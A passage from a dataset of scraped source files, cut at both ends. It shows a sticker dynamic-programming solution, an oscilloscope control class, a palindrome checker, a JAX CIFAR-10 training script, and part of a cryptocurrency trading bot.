max(sticker[i]+dp[i-2],sticker[i]+dp[i-3],dp[i-1])\r\n(0,1,2) 중 하나는 반드시 고르니까 세가지 케이스 확인하기\r\n\"\"\"\r\n\r\ndef solution(sticker):\r\n if len(sticker) <= 3: return max(sticker)\r\n dp1 = [0] * len(sticker)\r\n dp1[2] = sticker[2]\r\n dp2 = [0] * len(sticker)\r\n dp2[1] = dp2[2] = sticker[1]\r\n dp3 = [0] * len(sticker)\r\n dp3[0] = dp3[1] = dp3[2] = sticker[0]\r\n dp3[2] += sticker[2]\r\n for i in range(3,len(dp1)):\r\n dp1[i] = max(sticker[i]+dp1[i-2], sticker[i]+dp1[i-3], dp1[i-1])\r\n dp2[i] = max(sticker[i]+dp2[i-2], sticker[i]+dp2[i-3], dp2[i-1])\r\n dp3[i] = max(sticker[i]+dp3[i-2], sticker[i]+dp3[i-3], dp3[i-1])\r\n dp3[-1] = max(dp3[i-1],dp3[i-2],dp3[i-3])\r\n print(dp1)\r\n print(dp2)\r\n print(dp3)\r\n return max(dp1[-1],dp2[-1],dp3[-1])\r\n\r\n \r\nprint(solution([14,6,5,11,3,9,2,10]))\r\n","sub_path":"Level 4/스티커 모으기(2).py","file_name":"스티커 모으기(2).py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"18084853","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 26 18:39:33 2019\n\n@author: nicon\n\"\"\"\n\nimport pyvisa\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Osciloscopio(object):\n\n def __init__(self, instrument = 0): #Ver cual es 1 y 0 con el generador\n self.rm = pyvisa.ResourceManager()\n if len(self.rm.list_resources()) > 0:\n self.inst = self.rm.open_resource(self.rm.list_resources()[instrument])\n else:\n self.inst = []\n print('No se detectó ningún instrumento')\n if self.inst != []:\n try:\n print('El IDN del instrumento es ', self.inst.query(\"*IDN?\"))\n except:\n print('El instrumento no respondió cuando se le preguntó el nombre.')\n \n def data_encdg_ascii(self):\n self.inst.write('DATA:ENCDG ASCII')\n \n def data_encdg_bin(self):\n self.inst.write('DATA:ENCDG RIBinary')\n\n def get_data_ascii(self):\n self.data_encdg_ascii()\n read = self.inst.query_ascii_values('CURVe?')\n \n plt.plot(read)\n plt.show()\n \n return read\n \n plt.plot(read)\n plt.show()\n \n return read\n\n def read_voltage(self):\n \n self.data_encdg_bin()\n read = np.array(self.inst.query_binary_values('CURVe?', datatype = 'b', is_big_endian= True))\n \n ymult = self.inst.query_ascii_values('WFMPRE:YMULT?') #Vertical scale factor\n yzero = self.inst.query_ascii_values('WFMPRE:YZERO?') #Offset Voltage\n yoff = self.inst.query_ascii_values('WFMPRE:YOFF?') #Vertical Offset\n\n voltage = yzero + ymult*(read - yoff)\n \n # plt.plot(voltage)\n #plt.show()\n \n return voltage\n \n \n def read_time(self): \n xincr = self.inst.query_ascii_values('WFMPRE:XINCR?') #Horizontal sampling interval\n xzero = self.inst.query_ascii_values('WFMPRE:XZERO?')\n pt_off = self.inst.query_ascii_values('WFMPRE:PT_Off?')\n \n n = np.linspace(0,2500,2500)\n #Ver https://www.i3detroit.org/wi/images/2/2d/460-ProgrammerManual.pdf pag 2-43\n time = xzero + xincr*(n - pt_off)\n \n return time\n \n def grafico(self):\n voltage = self.read_voltage()\n time = self.read_time()\n \n vpp = 2*max(voltage)\n \n plt.plot(time, voltage)\n plt.xlabel('Time (s)')\n plt.ylabel('Voltage (V)')\n plt.show()\n \n return vpp\n\n \n def set_timebase(self, seconds):\n self.inst.write('HOR:DEL:SCA {}'.format(seconds))\n","sub_path":"Practica_1_Osciloscopio_Generador/Osciloscopio.py","file_name":"Osciloscopio.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"487517780","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nEste é um arquivo de script temporário.\n\n\n\n\"\"\"\n\ndef toChar(s):\n s = s.lower()\n ans = ''\n for c in s:\n if (c in 'abcdefghijklmnopqrstuvwxyz'):\n ans = ans + c\n return ans\n\n\ndef isPalindrome(frase):\n f = toChar(frase)\n \n if(len(f)<=1):\n return True\n else:\n return f[0]==f[-1] and isPalindrome(f[1:-1])\n\nprint(isPalindrome('Are we not drawn onward to new era?'))","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"429744485","text":"import argparse\n\nparser = argparse.ArgumentParser(description='Learn to classify a CIFAR-10')\nparser.add_argument('--step_size', dest='step_size', \n type=float, default=1e-2,\n help='Step size')\nparser.add_argument('--num_epochs', dest='num_epochs', \n type=int, default=100,\n help='Number of epochs')\nparser.add_argument('--batch_size', dest='batch_size', \n type=int, default=100,\n help='Mini-batch size')\nparser.add_argument('--tag', dest='tag', \n type=str, default=\"no_tag_{n_params}_params@\",\n help='Tag for logging with tensorboard')\nparser.add_argument('--layers', dest='layers_str', \n type=str, default=\"[Flatten, Dense(10),Softmax]\",\n help=\"Use ODE layer\")\nparser.add_argument('--log_dir', dest='log_dir', \n type=str, default=\"/tmp/checkpoints/\",\n help=\"Directory where to store tensorboard logs.\")\nparser.add_argument('--log_eps', dest='log_eps', \n type=float, default=1e-2,\n help='A constant to add the inputs of np.log to avoid log(0).')\nparser.add_argument('--l2_reg', dest='l2_reg', \n type=float, default=0.,\n help='Multiplies the l2 norm of the parameter vectors and added to the objective function.')\n\n\nargs = parser.parse_args()\nprint(args)\n\n\n# params\nstep_size = args.step_size\nnum_epochs = args.num_epochs\nbatch_size = args.batch_size\ntag = args.tag\nlayers_str = args.layers_str\nlog_dir = args.log_dir\nlog_eps = args.log_eps\nl2_reg = args.l2_reg\n\n# Imports\nimport datetime\nimport itertools\nimport jax\nimport jax.numpy as np\nimport keras\nimport matplotlib.pyplot as plt\nimport numpy as onp\nimport numpy.random as npr\nimport os\nimport pickle\nimport tarfile\nimport tensorboard_logging\nimport time\nimport zipfile \n\nfrom ode_stax import *\n\nfrom data_streamer import DataStreamer\nfrom jax import device_put\nfrom jax import grad\nfrom jax import jit\nfrom jax.config import config\nfrom jax.experimental import optimizers\nfrom jax.experimental import stax\nfrom jax.experimental.stax import BatchNorm\nfrom jax.experimental.stax import Conv\nfrom jax.experimental.stax import Dense\nfrom jax.experimental.stax import Dropout\nfrom jax.experimental.stax import Flatten\nfrom jax.experimental.stax import MaxPool\nfrom jax.experimental.stax import Relu\nfrom jax.experimental.stax import Softmax\nfrom jax.tree_util import tree_flatten\nfrom keras.datasets import cifar10\nfrom plot_help import *\n\n\n\n\n# init randomness\nkey = jax.random.PRNGKey(0)\nnpr.seed(0)\n\n\n# Download datasets\n# The data, split between train and test sets:\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\nx_train = (x_train / 250.).astype(np.float64)#.reshape(-1, 28, 28, 1)\nx_test = (x_test / 250.).astype(np.float64)#.reshape(-1, 28, 28, 1)\nnum_classes = 10\nprint('x_train shape:', x_train.shape)\nprint('y_train shape:', y_train.shape)\n\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n\n\n# Build NN\n@jit\ndef vec(params):\n \"\"\"Stack parameters in a big vector.\"\"\"\n \n leaves, _ = tree_flatten(params)\n return np.hstack([x.flatten() for x in leaves])\n\n\ndef cross_entropy(a, b):\n return - np.sum(a * np.log(b+log_eps))\n\n\n@jit\ndef loss(params, batch):\n inputs, targets = batch\n preds = predict(params, inputs, rng=key)\n return cross_entropy(targets, preds) + l2_reg * np.linalg.norm(vec(params))\n\n\n@jit\ndef accuracy(params, batch):\n inputs, targets = batch\n target_class = np.argmax(targets, axis=1)\n predicted_class = np.argmax(predict(params, inputs, rng=key), axis=1)\n return np.mean(predicted_class == target_class)\n\n\nprint(\"Evaluating layers from string:\", layers_str)\nlayers = eval(layers_str)\ninit_random_params, predict = stax.serial(*layers)\n\n\n\n \n################\n# Optimizer\n################\n\n# start adam optimizer and initialize parameters\nopt_init, opt_update = optimizers.adam(step_size)\nout_shape, init_params = init_random_params((-1,) + x_train.shape[1:])\nopt_state = opt_init(init_params)\nn_params = len(vec(init_params))\n\n# helper function to perform a one step update of the parameters\n@jit\ndef update(i, opt_state, batch):\n params = optimizers.get_params(opt_state)\n return opt_update(i, grad(loss)(params, batch), opt_state)\n\n\nprint(\"Gettting batches\")\ndata_streamer = DataStreamer(x_train, y_train, batch_size=batch_size, num_classes=num_classes)\ndata_streamer_test = DataStreamer(x_test, y_test, batch_size=batch_size, num_classes=num_classes)\n\nitercount = itertools.count()\nprint(\"Starting logger\")\nlogger = tensorboard_logging.create_logger(tag=tag.format(n_params=n_params), log_dir=log_dir)\nprint(\"Number of params %.4fk\" % (n_params/1e3))\n\n# Start iterating\nprint(\"|\".join(map(lambda s: s.center(10, ' '), \"Epoch,Loss,Accuracy,dt\".split(\",\"))))\nfor epoch in range(num_epochs):\n start_time = time.time()\n\n # loss and accuracy for each minibatch\n cum_loss = []\n cum_acc = []\n\n # runs through all the data\n for _ in range(data_streamer.num_batches):\n batch = next(data_streamer.stream_iter)\n i = next(itercount)\n opt_state = update(i, opt_state, batch)\n params = optimizers.get_params(opt_state)\n \n # logger\n loss_i = loss(params, batch)\n # evaluate accuracy on test batch\n batch_test = next(data_streamer.stream_iter)\n acc_i = accuracy(params, batch_test)\n cum_loss.append(loss_i)\n cum_acc.append(acc_i)\n logger.log_scalar('accuracy', acc_i, step=i+1)\n logger.log_scalar('loss', loss_i, step=i+1)\n\n epoch_time = time.time() - start_time\n print(\"{:10}|{:10.5f}|{:10.5f}|{:10.5f}\".format(epoch, onp.mean(cum_loss),\n onp.mean(cum_acc),\n epoch_time)) \n","sub_path":"learn_cifar.py","file_name":"learn_cifar.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"407831660","text":"from concurrent.futures import ThreadPoolExecutor\nimport time,datetime\nimport collections\nimport sys, os, traceback\nimport logging\nfrom abc import ABC, abstractmethod\n\nsys.path.append('../codebase')\nfrom helpText import errorTexts, statusTexts\nfrom util import createLogger\nfrom utilTrade import getKline\nfrom utilException import catchExceptionDecorator, catchMethodExceptionDecorator\n\nglobalTrendTrading = False\n\nclass SlarkBase(ABC):\n\tdef __init__(self, exch, logLevel, symbol, cfg, name):\n\t\tself.logger = createLogger('{}{}'.format(name, symbol[0:3]), logLevel)\n\t\tself.symbol = symbol\n\t\tself.name = name\n\t\tself.createExch(exch)\n\t\tself.initializeCfg(cfg) # call the derived methods\n\t\tself.initialize()\n\t\tself.logger.info('{} instance initialized successfully.'.format(self.name))\n\n\t@abstractmethod\n\tdef createExch(self, exch):\n\t\tpass\n\t@abstractmethod\n\tdef initializeCfg(self, cfg):\n\t\tpass\n\t@abstractmethod\n\tdef initialize(self):\n\t\tpass\n\nclass SlarkBalancePosition(SlarkBase):\n\tdef __init__(self, exch, logger, symbol, cfg, name):\n\t\tsuper(SlarkBalancePosition, self).__init__(exch, logger, symbol, cfg, name)\n\n\tdef createExch(self, exch):\n\t\tself.traderBalance\t= exch.cnExchTrade()\n\t\tself.account \t\t\t= exch.cnExchAccount()\n\t\tself.marketData \t\t= exch.cnExchMarketData()\n\t\tself.logger.info('SlarkBalancePosition traderBalance, account and marketData, have been initialized successfully.')\n\n\tdef initializeCfg(self, cfg):\n\t\tself.cfgLogOnly = ('yes' == cfg.get(self.symbol, 'logonly'))\n\t\tself.logger.info('SlarkBalancePosition cfg: logOnlyMode={}'.format('ON' if self.cfgLogOnly else 'OFF'))\n\n\tdef initialize(self):\n\t\tself.__updateOrderbook()\n\t\tself.__updateUserInfo()\n\n\tdef __updateOrderbook(self):\n\t\torderBook = self.marketData.depth(symbol = self.symbol, size = 15)\n\t\tself.bids = orderBook['bids']\n\t\tself.asks = orderBook['asks']\n\t\tself.logger.info('SlarkBalancePosition Update order book\\n\\\n\t\t\t\t\t\t\tnew bid prices: {}\\n\\\n\t\t\t\t\t\t\tnew ask prices: {}'.format(self.bids, self.asks))\n\n\tdef __updateUserInfo(self):\n\t\tuserinfo = self.account.userinfo()['info']['funds']\n\t\tfree = userinfo['free']\n\t\tself.coin = free[self.symbol[0:3]] # only for coins, not for contracts\n\t\tself.cny = free['cny']\n\t\tlatestPrice = (self.bids[0][0] + self.asks[0][0]) / 2 * 0.7 + \\\n\t\t\t\t\t (self.bids[1][0] + self.asks[1][0]) / 2 * 0.2 + \\\n\t\t\t\t\t (self.bids[2][0] + self.asks[2][0]) / 2 * 0.1\n\t\tself.balanceRatio = self.coin * latestPrice / (self.coin * latestPrice + self.cny)\n\t\tself.logger.info('SlarkBalancePosition Update user info: {} {}, CNY {}, latest balanceRatio: {}'.format(\n\t\t\tself.symbol[0:3].upper(), self.coin, self.cny, self.balanceRatio))\n\n\tdef trade(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef tradeHelper(self):\n\t\t\tglobal globalTrendTrading\n\t\t\tif globalTrendTrading:\n\t\t\t\ttime.sleep(30) # decrease the balance frequency\n\t\t\t\tself.logger.info('SlarkBalancePosition In trend trade state. Sleep 30s.')\n\t\t\t\treturn\n\n\t\t\tpreBalanceTime = time.time()\n\t\t\ttradeOrderIDs = ''\n\t\t\tif self.balanceRatio < 0.47:\n\t\t\t\ttime.sleep(10)\n\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\tself.logger.info('SlarkBalancePosition balanceRatio {}'.format(self.balanceRatio))\n\t\t\t\t\ttime.sleep(60)\n\t\t\t\t\treturn\n\t\t\t\torders = self.traderBalance.batch_trade(symbol = self.symbol, type = 'buy', orders_data = \n\t\t\t\t\t[{'price': self.bids[0][0] + 0.00, 'amount': (100 / (self.bids[0][0] + 0.00)), 'type':'buy'},\n\t\t\t\t\t {'price': self.bids[0][0] + 0.01, 'amount': (100 / (self.bids[0][0] + 0.01)), 'type':'buy'},\n\t\t\t\t\t {'price': self.bids[0][0] + 0.02, 'amount': (100 / (self.bids[0][0] + 0.02)), 'type':'buy'}])\n\t\t\t\torders = orders['order_info']\n\t\t\t\tfor i,order in enumerate(orders):\n\t\t\t\t\tif order['order_id'] == '-1':\n\t\t\t\t\t\tself.logger.error(\"SlarkBalancePosition error {} in batch_trade, {}th buy order,\\n\\\n\t\t\t\t\t\t\t\t\t\t\t Reason: {}\".format(order['error_code'], i, errorTexts[order['error_code']]))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttradeOrderIDs.append(order['order_id'] + ',')\n\t\t\t\tself.logger.info('SlarkBalancePosition buy traded IDs: {}'.format(orders))\n\t\t\telif self.balanceRatio > 0.53:\n\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\tself.logger.info('SlarkBalancePosition balanceRatio {}'.format(self.balanceRatio))\n\t\t\t\t\ttime.sleep(60)\n\t\t\t\t\treturn\n\t\t\t\torders = self.traderBalance.batch_trade(symbol = self.symbol, type = 'sell', orders_data = \n\t\t\t\t\t[{'price': self.asks[0][0] - 0.00, 'amount': (100 / (self.asks[0][0] - 0.00)), 'type':'sell'},\n\t\t\t\t\t {'price': self.asks[0][0] - 0.01, 'amount': (100 / (self.asks[0][0] - 0.01)), 'type':'sell'},\n\t\t\t\t\t {'price': self.asks[0][0] - 0.02, 'amount': (100 / (self.asks[0][0] - 0.02)), 'type':'sell'}])\n\t\t\t\torders = orders['order_info']\n\t\t\t\tfor i,order in enumerate(orders):\n\t\t\t\t\tif order['order_id'] == '-1':\n\t\t\t\t\t\tself.logger.error(\"SlarkBalancePosition error_code {} in batch_trade, {}th sell order,\\n\\\n\t\t\t\t\t\t\t\t\t\t\t Reason: {}\".format(order['error_code'], i, errorTexts[order['error_code']]))\n\t\t\t\t\telse:\n\t\t\t\t\t\ttradeOrderIDs.append(order['order_id'] + ',')\n\t\t\t\tself.logger.info('SlarkBalancePosition sell traded IDs: {}'.format(orders))\n\t\t\tself.__updateUserInfo()\n\t\t\tself.__updateOrderbook()\n\n\t\t\tif tradeOrderIDs:\n\t\t\t\ttime.sleep(0.4)\n\t\t\t\tcancelResult = self.traderBalance.cancel_order(symbol = self.symbol, order_id = tradeOrderIDs[:-1]) # [:-1] is to delete ','\n\t\t\t\tif 'error' in cancelResult:\n\t\t\t\t\tself.logger.error('SlarkBalancePosition order {} cancel fail in balance trade.'.format(cancelResult['error']))\n\t\t\twhile time.time() - preBalanceTime < 1:\n\t\t\t\ttime.sleep(0.005)\n\t\twhile True:\n\t\t\ttradeHelper(self)\n\n\nclass SlarkCancelLegacy(SlarkBase):\n\tdef __init__(self, exch, logger, symbol, cfg, name):\n\t\tsuper(SlarkCancelLegacy, self).__init__(exch, logger, symbol, cfg, name)\n\tdef createExch(self, exch):\n\t\tself.account \t\t\t\t= exch.cnExchAccount()\n\t\tself.traderBalance\t= exch.cnExchTrade()\n\t\tself.logger.info('SlarkBalancePosition traderBalance and account have been initialized successfully.')\n\tdef initializeCfg(self, cfg):\n\t\tself.cfgLogOnly\t\t\t= ('yes' == cfg.get(self.symbol, 'logonly'))\n\t\tself.logger.info('{} cfg: logOnlyMode={}'.format(self.name, 'ON' if self.cfgLogOnly else 'OFF'))\n\tdef initialize(self):\n\t\tpass\n\n\tdef trade(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef tradeHelper(self):\n\t\t\ttime.sleep(60)\n\t\t\torder_info = self.account.order_info(symbol = self.symbol, order_id = -1)\n\t\t\t# trivialException\n\t\t\t#self.logger.info('SlarkCancelLegacy order_info {}'.format(order_info))\n\t\t\topenOrders = order_info['orders']\n\t\t\tif not openOrders:\n\t\t\t\tself.logger.info('SlarkCancelLegacy no open orders')\n\t\t\telse:\n\t\t\t\tself.logger.info('SlarkCancelLegacy openOrders {}'.format(openOrders))\n\t\t\t\tif self.cfgLogOnly:\n\t\t\t\t\tself.logger.info('SlarkCancelLegacy is in logOnlyMode. Do not cancel any legacy orders.')\n\t\t\t\t\treturn\n\t\t\t\tcount = 0\n\t\t\t\tfor openOrder in openOrders:\n\t\t\t\t\tif openOrder['create_date'] / 1000 - time.time() < -10:\n\t\t\t\t\t\tresult = self.traderBalance.cancel_order(symbol = self.symbol, order_id = openOrder['order_id'])\n\t\t\t\t\t\tself.logger.info('SlarkCancelLegacy cancel order {} result:{}'.format(openOrder['order_id'], str(result)))\n\t\t\t\t\t\tcount += 1\n\t\t\t\t\t\tif 20 == count:\n\t\t\t\t\t\t\ttime.sleep(0.9) # frequency limit, 20 cancel / 2 s\n\t\t\t\t\t\t\tcount = 0\n\t\twhile True:\n\t\t\ttradeHelper(self)\n\nclass SlarkTrend(SlarkBase):\n\tdef __init__(self, exch, logger, symbol, cfg, name):\n\t\tsuper(SlarkTrend, self).__init__(exch, logger, symbol, cfg, name)\n\tdef initialize(self):\n\t\tself.lastTradedId = 9070000 # historical traded id\n\t\tself.vol = 0\n\t\tself.__updateTrades()\n\t\tprice = self.trades[-1]['price']\n\t\tself.prices = collections.deque(self.cfgPriceLen * [price], maxlen = self.cfgPriceLen)\n\t\tself.__updateOrderbook()\n\t\tself.__updateUserInfo()\n\t\tself.numTick = 0\n\t\tself.bull = False\n\t\tself.bear = False\n\t\tself.tradeAmount = 0\n\t\tself.currentPrice = 0\n\t\tself.burstPrice = 0\n\t\tself.state = 'NULL'\n\n\tdef createExch(self, exch):\n\t\tself.traderTrend\t\t= exch.cnExchTrade()\n\t\tself.account \t\t\t\t= exch.cnExchAccount()\n\t\tself.marketData \t\t= exch.cnExchMarketData()\n\t\tself.logger.info('SlarkTrend exchanges traderTrend, account and marketData, have been initialized successfully.')\n\n\tdef initializeCfg(self, cfg):\n\t\tself.cfgInterval\t= float(cfg.get(self.symbol, 'interval'))\n\t\tself.cfgPct\t\t \t\t= float(cfg.get(self.symbol, 'pct'))\n\t\tself.cfgVol \t \t\t= float(cfg.get(self.symbol, 'vol'))\n\t\tself.cfgPriceLen\t= int(cfg.get(self.symbol, 'pricelen'))\n\t\tself.cfgLogOnly\t\t\t= ('yes' == cfg.get(self.symbol, 'logonly'))\n\t\tself.lowerAmountLimit = float(cfg.get(self.symbol, 'lowerAmountLimit'))\n\t\tself.logger.info('SlarkTrend Config initialize:\\n\\\n\t\t\t\t\t\t trend trade time interval: {}s\\n\\\n\t\t\t\t\t\t burst price spread percentage: {}\\n\\\n\t\t\t\t\t\t burst volume: {} {}\\n\\\n\t\t\t\t\t\t logOnly: {}\\n\\\n\t\t\t\t\t\t lowerAmountLimit: {}'.format(\n\t\t\t\t\t\t self.cfgInterval, self.cfgPct, self.cfgVol, self.symbol[0:3].upper(), \n\t\t\t\t\t\t 'ON' if self.cfgLogOnly else 'OFF', self.lowerAmountLimit))\n\t\tself.logger.info('SlarkTrend config initialized successfully.')\n\n\tdef __updateTrades(self):\n\t\t\"\"\"\n\t\tget initial price from self.trades to initialize self.__prices, self.vol to compare market volume and config volume\n\t\t@attr trades: trades[-1] is the latest trade\n\t\t@type list of dicts: {amount:0.03, date:1498879798, date_ms:1498879798000, price:17778.50, tid:7575280178, type:buy}\n\n\t\t@attr vol: update in every call\n\t\t@type vol: long\n\n\t\t@attr lastTradedId: udpate in every call\n\t\t@type lastTradedId: long\n\t\t\"\"\"\n\t\tself.trades = self.marketData.trades(self.symbol, self.lastTradedId) # 想清楚返回多少trades 需要多少用来计算vol\n\t\tif self.trades:\n\t\t\tself.vol = 0.7 * self.vol + 0.3 * sum([it['amount'] for it in self.trades])\n\t\t\tself.lastTradedId = self.trades[-1]['tid']\n\t\t#self.logger.info('SlarkTrend Update trades\\n\\\n\t\t#\t\t\t\t\tnew vol: {}, last trades ID: {}'.format(self.vol, self.lastTradedId))\n \n\tdef __updateOrderbook(self):\n\t\t\"\"\"\n\t\tPrices is the time value sequence. Control the frequency! Or most slots are repeat!\n\t\t\"\"\"\n\t\torderBook = self.marketData.depth(symbol = self.symbol, size = 15)\n\t\tself.bids = orderBook['bids']\n\t\tself.asks = orderBook['asks']\n\t\tself.bidPrice = self.bids[0][0] * 0.618 + self.asks[0][0] * 0.382 + 0.01\n\t\tself.askPrice = self.bids[0][0] * 0.382 + self.asks[0][0] * 0.618 - 0.01\n\t\tself.prices.append(\n\t\t\t(self.bids[0][0] + self.asks[0][0]) / 2 * 0.7 +\n\t\t\t(self.bids[1][0] + self.asks[1][0]) / 2 * 0.2 +\n\t\t\t(self.bids[2][0] + self.asks[2][0]) / 2 * 0.1)\n\t\t#self.logger.info('SlarkTrend Update order book\\n\\\n\t\t#\t\t\t\t new bid price: {}, new ask price: {}\\n\\\n\t\t#\t\t\t\t prices: {}'.format(self.bidPrice, self.askPrice, self.prices))\n\n\tdef __updateUserInfo(self):\n\t\tself.userinfo = self.account.userinfo()['info']['funds']\n\t\tfree = self.userinfo['free']\n\t\tself.coin = free[self.symbol[0:3]] # only for coins, not for contracts\n\t\tself.cny = free['cny']\n\t\tself.balanceRatio = self.coin * self.prices[-1] / (self.coin * self.prices[-1] + self.cny)\n\t\t#self.logger.info('SlarkTrend Update user info: {} {}, CNY {}, latest balanceRatio: {}'.format(\n\t\t#\tself.symbol[0:3].upper(), self.coin, self.cny, self.balanceRatio))\n\n\tdef generateSignal(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef generateSignalHelper(self, timestamp0, timestamp1, minutes):\n\t\t\t#while time.time() - timestamp0 < self.cfgInterval:\n\t\t\twhile time.time() - timestamp0 < 1:\n\t\t\t\ttime.sleep(0.1)\n\t\t\ttimestamp1 = timestamp0\n\t\t\ttimestamp0 = time.time()\n\n\t\t\tself.__updateTrades()\n\t\t\tself.__updateOrderbook()\n\t\t\t#self.logger.info('SlarkTrend {} - {}, price: {}, net: {}, total: {}, balanceRatio: {} = {} {} / {}CNY, vol: {}'.format(\n\t\t\t#\t\t\tdatetime.datetime.fromtimestamp(timestamp1).strftime('%Y%m%d %H:%M:%S'),\n\t\t\t#\t\t\tdatetime.datetime.fromtimestamp(timestamp0).strftime('%Y%m%d %H:%M:%S'),\n\t\t\t#\t\t\tself.prices[-1],\n\t\t\t#\t\t\tself.userinfo['asset']['net'],\n\t\t\t#\t\t\tself.userinfo['asset']['total'],\n\t\t\t#\t\t\tself.balanceRatio,\n\t\t\t#\t\t\tself.coin,\n\t\t\t#\t\t\tself.symbol[0:3].upper(),\n\t\t\t#\t\t\tself.cny,\n\t\t\t#\t\t\tself.vol\n\t\t\t#\t\t\t))\n\t\t\tself.currentPrice = self.prices[-1]\n\t\t\t#self.burstPrice = self.currentPrice * self.cfgPct\n\t\t\tself.burstPrice = 0\n\t\t\tself.bull = False\n\t\t\tself.bear = False\n\t\t\tself.state = 'NULL'\n\t\t\tself.tradeAmount = 0\n\n\t\t\tidx = -1\n\t\t\twhile idx + self.cfgPriceLen > 0 and self.currentPrice == self.prices[idx]:\n\t\t\t\tidx -= 1\n\t\t\t# self.prices is dummy repeated\n\t\t\tif idx + self.cfgPriceLen == 0:\n\t\t\t\tself.logger.critical('SIGNAL __prices is dummy repeated')\n\t\t\t\treturn\n\t\t\t#self.logger.info('SIGNAL __prices {}'.format(list(self.prices)[0:idx]))\n\t\t\tif self.numTick > 2 and (self.currentPrice - max(list(self.prices)[0:idx]) > self.burstPrice or \n\t\t\t\t\t\t\t\t(idx > 1 and self.currentPrice - max(list(self.prices)[0:idx-1]) > self.burstPrice and \n\t\t\t\t\t\t\t\t self.currentPrice > self.prices[idx - 1])):\n\t\t\t\ttmpKline = self.marketData.kline(self.symbol, size= 2)\n\t\t\t\tif tmpKline[0][4] < tmpKline[1][4]:\n\t\t\t\t\tself.bull = True\n\t\t\t\t\tself.state = 'BULL'\n\t\t\t\t\tself.tradeAmount = self.cny / self.bidPrice * 0.99\n\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\tself.logger.info('numTick {}, currentPrice {}, prices {}, preK {}, nowK {}'.format(\n\t\t\t\t\t\t\tself.numTick, self.currentPrice, list(self.prices), tmpKline[0][4], tmpKline[1][4]))\n\t\t\t\t\t\tself.logger.info('SIGNAL BULL {}{} {}. State is {} now.'.format(\n\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), list(self.prices)[0:idx], self.state))\n\n\t\t\tif self.numTick > 2 and (self.currentPrice - min(list(self.prices)[0:idx]) < -self.burstPrice or \n\t\t\t\t\t\t\t\t(self.currentPrice - min(list(self.prices)[0:idx]) < -self.burstPrice and \n\t\t\t\t\t\t\t\t self.currentPrice < self.prices[idx - 1])):\n\t\t\t\ttmpKline = self.marketData.kline(self.symbol, size= 2)\n\t\t\t\tif tmpKline[0][4] > tmpKline[1][4]:\n\t\t\t\t\tself.bear = True\n\t\t\t\t\tself.state = 'BEAR'\n\t\t\t\t\tself.tradeAmount = self.coin\n\t\t\t\t\tif minutes != datetime.datetime.now().minute:\n\t\t\t\t\t\tminutes = datetime.datetime.now().minute\n\t\t\t\t\t\tself.logger.info('numTick {}, currentPrice {}, prices {}, nowK {}, preK {}'.format(\n\t\t\t\t\t\t\tself.numTick, self.currentPrice, list(self.prices), tmpKline[0][4], tmpKline[1][4]))\n\t\t\t\t\t\tself.logger.info('SIGNAL BEAR {}{} {}. State is {} now.'.format(\n\t\t\t\t\t\t\tself.tradeAmount, self.symbol[0:3].upper(), list(self.prices)[0:idx], self.state))\n\t\t\tself.numTick += 1\n\t\t### End of generateSignalHelper() ###\n\t\tglobalTrendTrading = False\n\t\ttimestamp1 = time.time()\n\t\ttimestamp0 = time.time()\n\t\tself.numTick = 0\n\t\tminutes = 0\n\t\twhile True:\n\t\t\tgenerateSignalHelper(self, timestamp0, timestamp1, minutes)\n\t\t\n\n\tdef trade(self):\n\t\t@catchMethodExceptionDecorator\n\t\tdef tradeHelper(self, minutes):\n\t\t\tif self.vol < self.cfgVol:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.tradeAmount *= self.vol / self.cfgVol\n\t\t\tif self.numTick < 5: \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.8\n\t\t\tif self.numTick < 10: \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.8\n\t\t\tif self.bull and self.currentPrice < max(self.prices): \t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.9\n\t\t\tif self.bear and self.currentPrice > min(self.prices): \t\t\t\t\t\t\t\t\tself.tradeAmount *= 0.9\n\t\t\t#if abs(self.currentPrice - list(self.prices)[idx - 1]) > self.burstPrice * 2: self.tradeAmount *= 0.9\n\t\t\t#if abs(self.currentPrice - list(self.prices)[idx - 1]) > self.burstPrice * 3: self.tradeAmount *= 0.9\n\t\t\t#if abs(self.currentPrice - list(self.prices)[idx - 1]) > self.burstPrice * 4: self.tradeAmount *= 0.9\n\t\t\tif abs(self.asks[0][0] - self.bids[0][0]) > self.burstPrice * 2:\t\t\t\tself.tradeAmount *= 0.9\n\t\t\tif abs(self.asks[0][0] - self.bids[0][0]) > self.burstPrice * 3:\t\t\t\tself.tradeAmount *= 0.9\n\t\t\tif abs(self.asks[0][0] - self.bids[0][0]) > self.burstPrice * 4:\t\t\t\tself.tradeAmount *= 0.9\n\t\t\t#self.logger.info('TRADE self.tradeAmount updated to {}'.format(self.tradeAmount))\n\t\t\tif self.tradeAmount >= self.lowerAmountLimit:\n\t\t\t\t#tradePrice = self.bidPrice if self.bull else self.askPrice\n\t\t\t\ttradePrice = (self.prices[-1] - 1) if self.bull else 